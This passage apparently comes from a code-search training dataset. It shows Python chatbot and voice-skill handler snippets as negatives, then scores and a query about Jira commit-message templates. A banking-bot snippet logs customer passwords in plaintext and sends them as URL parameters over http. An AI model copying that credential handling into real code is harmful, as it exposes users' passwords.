if incomign chat\n # is one of the scripted ones\n if any([chat in self.botCapabilityQuery for chat in preprocessed_chatstrs]):\n return BotCapabilities(**self.dialogue_object_parameters)\n if any([chat in self.botGreetings for chat in preprocessed_chatstrs]):\n return BotGreet(**self.dialogue_object_parameters)\n if any([\"debug_remove\" in chat for chat in preprocessed_chatstrs]):\n return BotVisionDebug(**self.dialogue_object_parameters)\n\n # don't use preprocess for ttad, done in the model code\n action_dict = self.ttad(s=chatstr, model=self.ttad_model)\n return self.handle_action_dict(speaker, action_dict, preprocessed_chatstrs[0])", "def handle_communications(self):\n\n packet = True\n\n while packet:\n\n # Try to fetch a packet from the analyzer.\n packet = self.fetch_packet_from_analyzer()\n\n # If we got one, handle using it in our UI.\n if not packet:\n break\n\n self.handle_incoming_packet(packet)", "def handle(self, handler_input):\n speech = \"I'm a sample Alexa Skill. Let me give you a random Chuck Norris Fact. \"\n speech += getChuckFact()\n speech += \". Do you want more awesome Chuck facts?\"\n \n \"\"\"\n Take note of the set_should_end_session. If set to 'True', the alexa\n skill will gracefully end execution.AbstractExceptionHandler\n \n The set_card method specifies what kind of cards do you want to use when\n interacting with the user via display. 
A 'SimpleCard' display's text.\n \n For more info about cards, see:\n https://developer.amazon.com/docs/custom-skills/include-a-card-in-your-skills-response.html\n \"\"\"\n handler_input.response_builder.speak(speech).set_card(\n SimpleCard(speech)).set_should_end_session(False)\n return handler_input.response_builder.response", "async def on_message_activity(self, turn_context: TurnContext):\n reply = MessageFactory.list([])\n # Get the state properties from the turn context.\n welcome_user_state = await self.user_state_accessor.get(\n turn_context, WelcomeUserState\n )\n\n if not welcome_user_state.did_welcome_user:\n welcome_user_state.did_welcome_user = True\n\n text = turn_context.activity.text.lower()\n\n if text in (\"hello\", \"hi\",\"intro\",\"help\",\"menu\"):\n #await self.__send_intro_card(turn_context)\n reply.attachments.append(self.create_signin_card())\n await turn_context.send_activity(reply)\n\n \n else:\n # This example hardcodes specific utterances. You should use LUIS or QnA for more advance language\n # understanding.\n print(\"Printing action------\",turn_context.activity.text)\n print(\"Printing JSON------\",turn_context._activity.value)\n \n\n if turn_context._activity.value is not None:\n print(\"Printing type------\",turn_context._activity.value[\"type\"])\n print(\"Printing customer id------\",turn_context._activity.value[\"customerId\"])\n print(\"Printing password------\",turn_context._activity.value[\"password\"])\n\n customerId = turn_context._activity.value[\"customerId\"]\n password = turn_context._activity.value[\"password\"]\n terms = turn_context._activity.value[\"terms\"]\n isvalid = True\n if (customerId is None) or (str(customerId).strip()==\"\"):\n isvalid = False\n await turn_context.send_activity(\"Please enter valid Customer ID\")\n if (password is None) or (str(password).strip()==\"\"):\n isvalid = False\n await turn_context.send_activity(\"Please enter valid Password\")\n if (terms is None or terms in (\"false\")):\n isvalid = False\n await turn_context.send_activity(\"Please accept the terms and conditions.\")\n\n if (isvalid and turn_context._activity.value[\"type\"] in (\"Login\")):\n # defining a params dict for the parameters to be sent to the API\n PARAMS = {'userName': customerId, 'password': password}\n # sending get request and saving the response as response object\n r = requests.get(url=\"http://localhost:8080/login\", params=PARAMS)\n # extracting data in json format\n data = r.json()\n print(\"printing response \", data[\"loginStatus\"])\n if (data[\"loginStatus\"] is not None and data[\"loginStatus\"] in (\"success\")):\n await turn_context.send_activity(\"Login Succeded\")\n await turn_context.send_activity(\"An OTP is sent to your registered mobile number xxxxxxxx90.\")\n await turn_context.send_activity(\"Please enter the OTP.\")\n else:\n await turn_context.send_activity(\"Login Failed. 
Please try again\")\n # for key in turn_context._activity.value:\n # print(turn_context._activity.value[key])\n \n else:\n text = turn_context.activity.text.lower()\n \n if text in (\"369\"):\n await turn_context.send_activity(\"Thanks!!\")\n await self.__send_intro_card(turn_context)\n elif text in (\"sign-in\", \"login\"):\n await self.__login_otp_card_card(turn_context)\n elif text in (\"hello\", \"hi\",\"intro\",\"help\",\"menu\"):\n await self.__send_intro_card(turn_context)\n #await turn_context.send_activity(f\"You said { text }\")\n elif text in (\"account balance\"):\n await self.__send_accountbalance_card(turn_context)\n await turn_context.send_activity(\"Also, your deposit xxxxxxxxx9243 is closed pre-maturely as per your request and amount is credited to your third party account.\")\n elif text in (\"xxxxxxxxx4567\"):\n await self.__list_accountTransaction_card(turn_context)\n await self.__mobile_billDue_card(turn_context)\n elif text in (\"yes, pay my mobile bill\"):\n await self.__show_invoice_card(turn_context)\n await self.__show_selectAccountForBill_card(turn_context)\n elif text in(\"debit from xxxxxxxxx4567\"):\n await turn_context.send_activity(\"An OTP is sent to your registered mobile number xxxxxxxx90.\")\n await turn_context.send_activity(\"Please enter the OTP.\")\n elif text in (\"1234\"):\n await turn_context.send_activity(\"Transaction Successful !! Mobile bill paid for $100 from your account number xxxxxxxxx4567\")\n await turn_context.send_activity(\"As a loyal customer, we are happy to offer you one year free VISA card which comes with $25 movie voucher.\\n\\n Also your balance reward points 514 from card xxxxxxxxxxxx7653 will be added to the new card.\")\n await self.__show_congratulations_card(turn_context)\n elif text in (\"credit card\"):\n await turn_context.send_activity(\"Credit card xxxxxxxxxxxx7653 \\n\\n Current outstanding is $0.00 \\n\\n Card closed on 09/01/2020 \\n\\n Balance reward points are 514\")\n elif text in (\"service requests\"):\n await turn_context.send_activity(\"Currently there are no open service requests.\")\n elif text in (\"xxxxxxxxx4566\"):\n await turn_context.send_activity(\"Your current account xxxxxxxxx4566 is Active, but there are no transactions on it.\")\n elif text in (\"debit from xxxxxxxxx4566\"):\n await turn_context.send_activity(\"Insufficient account balance. Please choose another account\")\n await self.__show_selectAccountForBill_card(turn_context)\n #else:\n #await self.__send_intro_card(turn_context)", "def useSpeech(self):\n # Implements a subprocess to run the Kuri robot simultaneously with the user input loop\n proc_stdin = io.TextIOWrapper(self.proc.stdin, encoding='utf-8', line_buffering=True)\n\n while True:\n prompt = input(\"Type 's' to begin recording! 
(Type 'q' to quit) \").lower()\n if prompt == 'q':\n proc_stdin.write('q\\n')\n quit()\n if prompt == 's':\n txt = self.sr.getSpeech(\"Recording...\")\n print(\"Finished recording!\")\n if not txt:\n print(\"\\nCould you say that again?\")\n else:\n sentiment = self.sd.getSentiment(txt)\n proc_stdin.write(sentiment + '\\n')\n print(\"Sentiment: \" + sentiment + '\\n')", "def on_intent(intent_request, session):\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n # intents_object = get_custom_intents()\n print (\"************\")\n print (intent_request)\n # fall_back = True\n # final_function = ''\n # for temp_intent in intents_object:\n # if temp_intent == intent_name:\n # fall_back = False\n # final_function = temp_intent[1]\n # break\n # if(fall_back):\n # return custom_handlers.get_fallback_msg()\n # else:\n # return final_function(intent, session)\n \n # Dispatch to your skill's intent handlers\n if intent_name == \"welcome_intent\":\n return custom_handlers.get_welcome_msg(intent, session)\n elif intent_name == \"search_intent\":\n return custom_handlers.get_search_msg(intent, session)\n elif intent_name == \"architecture\":\n return custom_handlers.get_architecture_msg(intent, session)\n elif intent_name == \"saybye\":\n return custom_handlers.get_saybye_response(intent, session)\n elif intent_name == \"myname\":\n return custom_handlers.get_myname_response(intent, session)\n elif intent_name == \"ask\":\n return custom_handlers.get_ask_response(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return custom_handlers.get_welcome_response(intent, session)\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return custom_handlers.handle_session_end_request(intent, session)\n else:\n return custom_handlers.get_fallback_msg(intent, session)", "def respond_from_waiting(self, message, tags):\n self.stance = None\n self.used_arguments = []\n\n # Use tags and message to determine user stance, then define bot's stance as the opposite\n # If user is neutral/has no opinion, the bot will randomly choose between pro and con\n\n if 'veganism' in tags or 'anti_vegan_stance' in tags or 'pro_vegan_stance' in tags: #we might wanna delete this part, as it is unnecessary, the conversation is already about veganism\n for stance in self.STANCES:\n # If user is pro-vegan, bot takes anti-vegan stance\n if 'pro_vegan_stance' in tags:\n self.stance = 'anti_vegan'\n # print(\"is in pro vegan stance\")\n return self.go_to_state('anti_vegan_stance')\n\n # Determine the first argument the bot will use, add to used_arguments\n #\n #return self.go_to_state('anti_vegan_stance')\n\n # If user is anti-vegan, bot takes pro-vegan stance\n elif 'anti_vegan_stance' in tags:\n self.stance = 'pro_vegan'\n # print(\"is in anti vegan stance\")\n return self.go_to_state('pro_vegan_stance')\n\n # If user is neutral, bot chooses randomly between pro and anti vegan stances\n else:\n # Choose stance randomly\n self.stance = random.choice(STANCES)\n\n if self.stance == 'pro_vegan':\n return self.go_to_state('pro_vegan_stance')\n else:\n return self.go_to_state('anti_vegan_stance')\n\n elif 'thanks' in tags:\n return self.finish('thanks')\n else:\n return self.finish('confused')", "async def test_target_dialogue_state_management(self, dm):\n context = create_request(\"domain\", \"intent\")\n result = await dm.apply_handler(\n context, create_responder(context), target_dialogue_state=\"intent_entity_2\"\n )\n assert result.dialogue_state == 
\"intent_entity_2\"", "def on_intent(intent_request, session):\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n if intent_name == \"GUTSIntent\":\n session_attributes = {}\n return build_response(session_attributes, build_speechlet_response(\n \"GUTSCard\", \"I have the GUTS\", \"I love hackathons\", True))\n\n if intent_name == \"LoveAIntent\":\n #session_attributes = {}\n #if loveStage = 1:\n # return build_response(session_attributes, build_speechlet_response(\n # \"Love1Card\", \"I love Theo!\", \"I love Theo so much!\", False))\n return handle_love_A_intent(session)\n\n if intent_name == \"LoveBIntent\":\n return handle_love_B_intent(session)\n\n if intent_name == \"LoveCIntent\":\n return handle_love_C_intent(session)", "def on_intent(intent_request, session):\r\n\r\n print(\"on_intent requestId=\" + intent_request['requestId'] +\r\n \", sessionId=\" + session['sessionId'])\r\n\r\n intent = intent_request['intent']\r\n intent_name = intent_request['intent']['name']\r\n \r\n if intent_name == \"unsafe\":\r\n send_message_alerts()\r\n session_attributes = {}\r\n card_title = \"Welcome, this is Emma\"\r\n speech_output = \"Calling police, Connected with police , Police on the way. Police will be in 1 min . Your relatives and frieds are all informed. Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me\"\r\n \r\n # If the user either does not reply to the welcome message or says something\r\n # that is not understood, they will be prompted again with this text.\r\n reprompt_text = \"Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me ,Help Me, Help Me, Help Me, Help Me, Help Me \"\r\n \r\n should_end_session = False\r\n return build_response(session_attributes, build_speechlet_response(\r\n card_title, speech_output, reprompt_text, should_end_session))\r\n \r\n \r\n \r\n elif intent_name == \"AMAZON.HelpIntent\":\r\n return get_welcome_response()\r\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\r\n return handle_session_end_request()\r\n else:\r\n raise ValueError(\"Invalid intent\")", "def on_intent(event_request, session):\n print(\"=====on_intent requestId: \" + event_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = event_request['intent']\n intent_name = event_request['intent']['name']\n print(\"=====intent is: \" + intent_name)\n\n if intent_name == \"AnswerIntent\":\n print(\"=====AnswerIntent fired...\")\n if 'attributes' in session:\n if 'questions' in session['attributes']:\n return handle_answer_request(intent, session)\n\n # we probably got here because user said something other than\n # yes or no after asking if they wanted to play the game again\n print(\"=====no attributes ending game\")\n return play_end_message()\n if intent_name == \"GameIntent\":\n print(\"=====GameIntent fired...\")\n # if there's a session and we're in a game treat this as an answer\n # unfortunately it will be wrong but it's better than starting over\n if 'attributes' in session:\n if session['attributes']['game_status'] == \"in_progress\":\n return handle_answer_request(intent, session)\n return play_new_game(False)\n if intent_name in (\"AMAZON.StartOverIntent\", 
\"AMAZON.YesIntent\"):\n print(\"=====StartOverIntent or YesIntent fired...\")\n return play_new_game(True)\n if intent_name == \"AMAZON.NoIntent\":\n print(\"=====NoIntent fired...\")\n # if there's a session and we're in a game treat this as a wrong answer\n if 'attributes' in session:\n if session['attributes']['game_status'] == \"in_progress\":\n return handle_answer_request(intent, session)\n # otherwise end the game\n return play_end_message()\n if intent_name in (\"AMAZON.StopIntent\", \"AMAZON.CancelIntent\"):\n print(\"=====StopIntent or CancelIntent fired\")\n return play_end_message()\n if intent_name == 'AMAZON.HelpIntent':\n print(\"=====HelpIntent...\")\n tts = \"During the game I'll give you 6 random brain teasers and only 8 \"\\\n \"seconds to anser each one... To make your mind muscles stronger, I \"\\\n \"won't repeat any of the questions, so try to remember all the \"\\\n \"details... You can say 'Start Over' if you'd like a new game, \"\\\n \"or make your guess for the last question...\"\n return speech(tts, session['attributes'], False, None)", "def func(self):\n if not self.args:\n self.msg(\n \"{wYou are currently speaking:{n %s\"\n % self.caller.languages.current_language.capitalize()\n )\n self.list_languages()\n return\n if \"translate\" in self.switches:\n obj = self.caller.search(self.args)\n if not obj:\n return\n translation = obj.item_data.translation\n matches = False\n for lang in self.caller.languages.known_languages:\n if lang in translation:\n self.msg(\n \"You translate the following from %s:\\n%s\"\n % (lang.capitalize(), translation[lang])\n )\n matches = True\n if not matches:\n self.msg(\n \"%s does not seem to contain any foreign tongue you can read.\" % obj\n )\n return\n if not self.switches:\n args = self.args.lower()\n if args == \"arvani\" or args == \"common\":\n self.caller.attributes.remove(\"currently_speaking\")\n self.msg(\"{wYou are now speaking Arvani.{n\")\n return\n if args not in self.caller.languages.known_languages:\n self.msg(\"You cannot speak %s.\" % self.args)\n self.list_languages()\n return\n self.caller.db.currently_speaking = args\n self.msg(\"{wYou are now speaking %s.{n\" % self.args)\n return\n player = self.caller.player.search(self.lhs)\n if not player:\n return\n targ = player.char_ob\n if not targ:\n self.msg(\"Not found.\")\n return\n if \"teachme\" in self.switches:\n if self.caller.languages.additional_languages <= 0:\n self.msg(\n \"You need a higher rank of linguistics before you can learn anything else.\"\n )\n return\n req = targ.ndb.language_requests or {}\n req[self.caller] = self.rhs\n targ.ndb.language_requests = req\n self.msg(\"You request that %s teach you %s.\" % (targ, self.rhs))\n targ.msg(\n \"{w%s has requested that you teach them %s.{n\" % (self.caller, self.rhs)\n )\n return\n if \"teach\" in self.switches:\n req = self.caller.ndb.language_requests or {}\n if targ not in req:\n self.msg(\"You do not have a request from %s.\" % targ)\n return\n lang = req[targ].lower()\n if lang not in self.caller.languages.known_languages:\n self.msg(\"You do not know %s.\" % lang)\n self.list_languages()\n return\n if targ.languages.max_languages <= len(targ.languages.known_languages):\n self.msg(\"They know as many languages as they can learn.\")\n return\n targ.languages.add_language(lang)\n self.msg(\"You have taught %s to %s.\" % (lang, targ))\n targ.msg(\"%s has taught you %s.\" % (self.caller, lang))\n return", "def handle_kitten(self):\n\n # Get a list of talks.\n talks = Proposal.objects.talks()\n 
counter = 0\n\n # Iterate over talks until we either run out of talks,\n # or have hit the number we are supposed to be reviewing.\n for talk in talks:\n # Sanity check: Does this talk belong?\n if self.args.start and talk.id < self.args.start:\n continue\n\n # If this talk is decided, don't include it.\n if talk.status != 'undecided':\n continue\n\n # If this is the first talk, print out an agenda header; if it's\n # the first talk of overflow, print out an overflow header.\n if counter == 0:\n print '=== AGENDA ===\\n'\n if counter == self.args.num and self.args.overflow > 0:\n print '=== OVERFLOW ===\\n'\n\n # Okay, now print out the talk information.\n print talk.agenda_format\n\n # Increment the counter, so we know how far to go.\n # If we've printed out enough talks, stop.\n counter += 1\n if counter == self.args.num + self.args.overflow:\n return", "def handle_action_dict(self, speaker: str, d: Dict, chatstr: str) -> Optional[DialogueObject]:\n coref_resolve(self.agent.memory, d, chatstr)\n logging.info('ttad post-coref \"{}\" -> {}'.format(hash_user(speaker), d))\n\n if d[\"dialogue_type\"] == \"NOOP\":\n return Say(\"I don't know how to answer that.\", **self.dialogue_object_parameters)\n elif d[\"dialogue_type\"] == \"HUMAN_GIVE_COMMAND\":\n return Interpreter(speaker, d, **self.dialogue_object_parameters)\n elif d[\"dialogue_type\"] == \"PUT_MEMORY\":\n return PutMemoryHandler(speaker, d, **self.dialogue_object_parameters)\n elif d[\"dialogue_type\"] == \"GET_MEMORY\":\n logging.info(\"this model out: %r\" % (d))\n logging.info(\"querying previous model now\")\n if self.ttad_prev_model:\n prev_model_d = self.ttad(s=chatstr, model=self.ttad_prev_model, chat_as_list=True)\n logging.info(\"prev model out: %r\" % (prev_model_d))\n if (\n prev_model_d[\"dialogue_type\"] != \"GET_MEMORY\"\n ): # this happens sometimes when new model sayas its an Answer action but previous says noop\n return Say(\n \"I don't know how to answer that.\", **self.dialogue_object_parameters\n )\n return GetMemoryHandler(speaker, prev_model_d, **self.dialogue_object_parameters)\n else:\n return GetMemoryHandler(speaker, d, **self.dialogue_object_parameters)\n else:\n raise ValueError(\"Bad dialogue_type={}\".format(d[\"dialogue_type\"]))" ]
[ "0.607286", "0.60394377", "0.59018356", "0.5812541", "0.5732079", "0.5696963", "0.56619567", "0.56086385", "0.5504005", "0.54966825", "0.54938865", "0.5492362", "0.5490855", "0.54654175", "0.5454416", "0.5349049", "0.5348369", "0.53459346", "0.5345559", "0.53378665", "0.5323232", "0.5315376", "0.53119636", "0.5302778", "0.5295307", "0.52725327", "0.5267203", "0.52649814", "0.52209496", "0.5210147" ]
0.66725177
0
Creates a git commit message template for cases currently assigned to you.
def do_jira_case_commit_message(self, arg): cases = [(issue.key, issue.fields.summary, self.jira_url() + "/browse/" + issue.key) for issue in self.get_open_issues()] msg = """ -------------------------------------------------------------------- [{}] {} <msg> {} -------------------------------------------------------------------- """ for case in cases: print(msg.format(case[0], case[1], case[2]))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _generate_commit(\n self, msg: Optional[str] = None, author: Optional[str] = None\n ) -> dict:\n if author:\n mes_author = author\n else:\n mes_author = self._author\n if not msg:\n msg = f\"Commit via python client {__version__}\"\n ci = {\"commit_info\": {\"author\": mes_author, \"message\": msg}}\n return ci", "def create_template(self):\n options = {\n 'dir': os.path.join(os.path.dirname(__file__)),\n 'template': self.template,\n 'project': self.project,\n 'answers_file': self.answers_file,\n }\n return self.env.run(\n '%(dir)s/bin/mrbob -O %(project)s --config '\n '%(dir)s/%(answers_file)s %(dir)s/bobtemplates/%(template)s'\n % options)", "def _get_mail_template(request, issue, full_diff=False):\n context = {}\n template = 'mails/comment.txt'\n if request.user == issue.owner:\n query = models.Message.query(\n models.Message.sender == request.user.email(), ancestor=issue.key)\n if query.count(1) == 0:\n template = 'mails/review.txt'\n files, patch = _get_affected_files(issue, full_diff)\n context.update({'files': files, 'patch': patch, 'base': issue.base})\n return template, context", "async def _cmdf_chtemplate(self, substr, msg, privilege_level):\n if len(substr) == 0:\n await self._client.send_msg(msg, \"Error: No content.\")\n return\n elif len(substr) > 1800: # This value is arbitrary.\n await self._client.send_msg(msg, \"Error: Message is too long.\")\n return\n\n self._ch_msg_template = substr\n self._save_settings()\n\n await self._client.send_msg(msg, \"Successfully set the new in-channel greeting template. Please double-check.\")\n return", "def create_actions_template(name):\n template = Template(ACTIONS_TEMPLATE)\n msg = template.render(name=name)\n return msg", "def __generateDefaultCommitMessage(self):\n if self.commitGroupBox.isChecked():\n if self.idButton.isChecked():\n msg = \"Merged commit {0} into {1}.\".format(\n self.idEdit.text(), self.__currentBranch)\n elif self.tagButton.isChecked():\n msg = \"Merged tag {0} into {1}.\".format(\n self.tagCombo.currentText(), self.__currentBranch)\n elif self.branchButton.isChecked():\n msg = \"Merged branch {0} into {1}.\".format(\n self.branchCombo.currentText(), self.__currentBranch)\n elif self.remoteBranchButton.isChecked():\n msg = \"Merged remote branch {0} into {1}.\".format(\n self.remoteBranchCombo.currentText(), self.__currentBranch)\n else:\n msg = \"Merged into {0}.\".format(self.__currentBranch)\n self.commitMessageEdit.setPlainText(msg)\n else:\n self.commitMessageEdit.clear()", "def _generate_markdown(self, case):\n # Lucene query generation\n lucene_dict = {\n \"sources\": case[\"detection\"][\"sources\"],\n \"data\": case[\"input_arguments\"],\n }\n case[\"lucene_query\"] = self.templates[\"lucene\"].render(lucene_dict)\n # AWS CLI command generation\n command_template = jinja2.Template(case[\"executors\"][\"sh\"][\"code\"])\n if case[\"input_arguments\"]:\n aws_cli_render_args = {}\n for arg in case[\"input_arguments\"]:\n aws_cli_render_args[arg] = case[\"input_arguments\"][arg][\"value\"]\n case[\"compiled_command\"] = command_template.render(aws_cli_render_args)\n else:\n case[\"compiled_command\"] = command_template.render()\n\n render_dict = {\"case\": case}\n return self.templates[\"markdown\"].render(render_dict)", "def issue_create():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"-a\", \"--assignees\", default=[], nargs=\"*\", help=\"users to assign to this issue\"\n )\n parser.add_argument(\"-b\", \"--body\", default=None, help=\"text body of the issue\")\n 
parser.add_argument(\n \"-c\",\n \"--column\",\n default=DEFAULT_COLUMN_NAME,\n help=\"name of column to place card in\",\n )\n parser.add_argument(\n \"-i\",\n \"--interactive\",\n action=\"store_true\",\n default=DEFAULT_COLUMN_NAME,\n help=\"Edit issue title and body in vim\",\n )\n parser.add_argument(\n \"-l\", \"--labels\", default=None, nargs=\"*\", help=\"labels to add to the new issue\"\n )\n parser.add_argument(\n \"-m\",\n \"--milestone\",\n default=None,\n help=\"milestone id to place this issue in. \"\n \"This should be an integer. \"\n \"Find milestone ids with the `milestones` command.\",\n )\n parser.add_argument(\n \"-p\", \"--project\", default=SCRUM_BOARD_NAME, help=\"project to create issue in\"\n )\n parser.add_argument(\"title\", default=None, nargs=\"?\", help=\"issue title\")\n\n args = parser.parse_args()\n\n # only required arg for creating an issue. can be overridden in interactive mode\n title = args.title\n\n # this can be overridden in interactive mode\n body = args.body\n\n if args.interactive:\n with tempfile.NamedTemporaryFile(\"w\") as fh:\n path = fh.name\n\n editor = os.environ.get(\"EDITOR\", os.environ.get(\"VISUAL\", \"vi\"))\n\n proc = getattr(sh, editor)\n\n proc(path, _fg=True)\n\n with open(path, \"r\") as rfh:\n\n # grab top line as title\n title = rfh.readline().replace(\"\\n\", \"\")\n\n # grab remaining lines as body\n body = \"\".join(rfh.readlines())\n\n session = GithubSession()\n\n additional_args = {\n \"assignees\": args.assignees,\n \"body\": body,\n \"labels\": args.labels,\n \"milestone\": args.milestone,\n }\n\n issue = session.create_issue(title, **additional_args)\n\n column_name = args.column\n project_name = args.project\n\n project = session.get_project(project_name)\n column = session.get_column(project, column_name)\n\n # finally, create the card\n session.create_card(column, issue)\n\n print(json.dumps(issue, indent=2))", "def read_template():\n\n text_msg = \"\"\"${PERSON_NAME} - Calling Campaign Summary - ${DATE}:\\n\n Total Called = ${TOTAL_CALLED}\\n\n Answered = ${ANSWERED}\\n\n Not Answered = ${NOT_ANSWERED}\\n\n Declines = ${DECLINES}\\n\n Remaining = ${REMAINING}\\n\n \\n\n Thank You.\"\"\"\n\n return Template(text_msg)", "def format_template(commit_info, nb):\n\n nb_path = os.path.abspath(nb).replace('ipynb', 'md')\n with open(nb_path, 'r+') as file:\n template = NbTemplate(file.read())\n updated = template.substitute(commit_info)\n file.seek(0)\n file.write(updated)\n file.truncate()", "def create(ctx):\n pass", "def _create_tag_message(commits: List[git.objects.commit.Commit],\n tag: semantic_version.Version) -> str:\n\n tag_message = 'Release {} \\n\\n'.format(str(tag))\n\n for message in [c.message for c in commits]:\n tag_message += ' * {}\\n'.format(message.split('\\n')[0].strip())\n return tag_message", "def make_git_config(self):\n if self.kind == 'personal':\n context = dict(\n name='Rob deCarvalho',\n email='[email protected]',\n github_user_spec=textwrap.dedent(\n \"\"\"\n [github]\n user = robdmc\n \"\"\"\n )\n )\n elif self.kind == 'generic':\n context = dict(\n name='Generic User',\n email='[email protected]',\n github_user_spec='',\n )\n\n else:\n raise ValueError('\"kind\" must be in [\"personal\", \"generic\"]')\n\n with open(os.path.join(FILE_PATH, 'gitconfig_template')) as f:\n template = f.read()\n contents = template.format(**context)\n\n if self.dry_run:\n print('=' * 40 + ' .git_config ' + '=' * 40)\n print(contents)\n print('=' * 40 + ' end .git_config ' + '=' * 40)\n else:\n with 
open(os.path.expanduser('~/.gitconfig'), 'w') as out:\n out.write(contents)", "async def create_ticket(self, member : Member, guild : Guild):\n licence_id = await servers.get_licence_id(guild.id)\n category : CategoryChannel = guild.get_channel(await self.categorys.get_category_id(licence_id))\n role = guild.get_role(await self.roles.get_role_id(licence_id))\n \n\n channel : TextChannel = await category.create_text_channel(f'ticket-{member.name}')\n\n overwrite_everyone = PermissionOverwrite()\n overwrite_everyone.send_messages = False\n overwrite_everyone.read_messages = False\n\n overwrite_member = PermissionOverwrite()\n overwrite_member.send_messages = True\n overwrite_member.read_messages = True\n\n\n everyone_role = guild.default_role\n\n await channel.set_permissions(target=everyone_role,overwrite=overwrite_everyone)\n await channel.set_permissions(target=member, overwrite=overwrite_everyone)\n await channel.set_permissions(target=role, overwrite=overwrite_member)\n await channel.send(content = member.mention + \" \" + role.mention)", "def message_of(cfg, ticket, phase):\n return cfg[\"message_template\"] % (ticket, text(cfg, phase))", "def create_letter(cls, donor_status, donor_name, donation_amt):\n if donor_status == 0:\n letter_text = '''\n Dear {0},\n\n Thank you for your very kind donation of ${1:.2f}, and for your continuing support.\n\n Your generous contribution will be put to very good use.\n\n Sincerely,\n -The Team\n '''.format(donor_name, donation_amt)\n return letter_text\n elif donor_status == 1:\n letter_text = '''\n Dear {0},\n\n Thank you for your very kind donation of ${1:.2f}.\n\n Your generous contribution will be put to very good use.\n\n Sincerely,\n -The Team\n '''.format(donor_name, donation_amt)\n return letter_text\n elif donor_status == 2:\n return ('''\n Dear {0},\n\n Thank you for your very kind contribution(s) totaling ${1:.2f}.\n\n We would like you to know that your generous donation(s) will be put to very good use.\n\n Sincerely,\n -The Team\n '''.format(donor_name, donation_amt))", "def _create_pre_commit(destination, template, context):\n # Is there already a hook?\n if isfile(destination) and not _pre_commit_has_hallmark(destination):\n raise PreCommitExists('{0} already exists'.format(destination))\n\n with open(destination, 'w') as fh:\n fh.write(template.format(**context))\n\n sinfo = stat(destination)\n mode = sinfo.st_mode | S_IXUSR | S_IXGRP | S_IXOTH\n\n # Make sure it's executable\n chmod(destination, mode)\n\n return destination", "def make_commit(self, commit_message, branch_name) -> Commit:\n self.load_config()\n commit = Commit(commit_message)\n commit.branch_name = branch_name\n commit.init_config()\n branch = Branch.make_branch_from_config(branch_name)\n prev_commit = branch.get_current_commit()\n if prev_commit is not None:\n commit_number = prev_commit.commit_number\n commit.set_previous_commit_number(commit_number)\n commit.freeze_files(self.__indexed_files, self.__directory)\n self.__last_commit = commit\n self.config['info']['files'] = ''\n self.config['info']['last_commit'] = commit.commit_number\n self.config['info']['last_commit_branch'] = commit.branch_name\n self.save_config()\n return commit", "def create_test_audit_template(context, **kw):\n audit_template = get_test_audit_template(context, **kw)\n audit_template.create()\n return audit_template", "def build_commit_msg(author, reviewers, source_branch, target_branch,\n commit_message, mp_web_link):\n return \"Merge {} into {} [a={}] [r={}]\\n\\n{}\\n\\nMP: {}\".format(\n 
source_branch, target_branch, author,\n reviewers, commit_message, mp_web_link)", "def createchore():\n return render_template(\"newchore.html\")", "def create_crud_template(name):\n template = Template(CRUD_TEMPLATE)\n msg = template.render(name=name)\n return msg", "def new_assignment(self, fname, lname, codename,\n assignment, duedate, duetime):\n return self._env.get_template('new_assignment.txt').render(\n fname=fname,\n lname=lname,\n codename=codename,\n assignment=assignment,\n duedate=duedate,\n duetime=duetime\n )", "def cmd_conversation_create(client, args):\n create_message = client.create_message(args.recipient, args.body)\n generate_output({'create_message': create_message})", "def generate(problem, prompt_default=True):\n\n msg = \"Generate file for problem %i?\" % problem\n click.confirm(msg, default=prompt_default, abort=True)\n problemText = get_problem(problem)\n\n filename = get_filename(problem)\n\n if os.path.isfile(filename):\n msg = '\"{0}\" already exists. Overwrite?'.format(filename)\n click.confirm(click.style(msg, fg='red'), abort=True)\n\n problemHeader = 'Project Euler Problem %i\\n' % problem\n problemHeader += '=' * len(problemHeader.strip()) + '\\n\\n'\n\n with open(filename, 'w') as file:\n file.write('\"\"\"\\n')\n file.write(problemHeader)\n file.write(problemText)\n file.write('\"\"\"\\n\\n\\n')\n\n click.secho('Successfully created \"{0}\".'.format(filename), fg='green')", "def create_html(text, template, output):\n\n # TODO uncomment this for orginal DMP format (right now difficult with differing section sizes)\n #templateLoader = jinja2.FileSystemLoader(searchpath=\"../templates/new\")\n templateLoader = jinja2.FileSystemLoader(searchpath=\"../templates\")\n templateEnv = jinja2.Environment(loader=templateLoader)\n TEMPLATE_FILE = \"template_\" + template.lower() + \".html\"\n real_template = templateEnv.get_template(TEMPLATE_FILE)\n\n outputText = real_template.render(contact=text)\n html_file = open(output + \".html\", \"w\")\n html_file.write(outputText)\n html_file.close()\n\n return output + \".html\"", "def generate(self):\n\n letter = ''\n\n for template_name in self.templates:\n template = self.templates[template_name]\n\n # Process all replacements ({...} syntax).\n replacements = re.finditer(REPLACEMENT_REGEX, template)\n for replacement in replacements:\n match = replacement.group()\n key = replacement.group(1)\n\n template = template.replace(match, self._lookup(key))\n\n # Process all conditionals (<...> syntax).\n conditionals = re.finditer(CONDITIONAL_REGEX, template)\n for conditional in conditionals:\n match = conditional.group()\n\n # Process each condition within the conditional ([...]... 
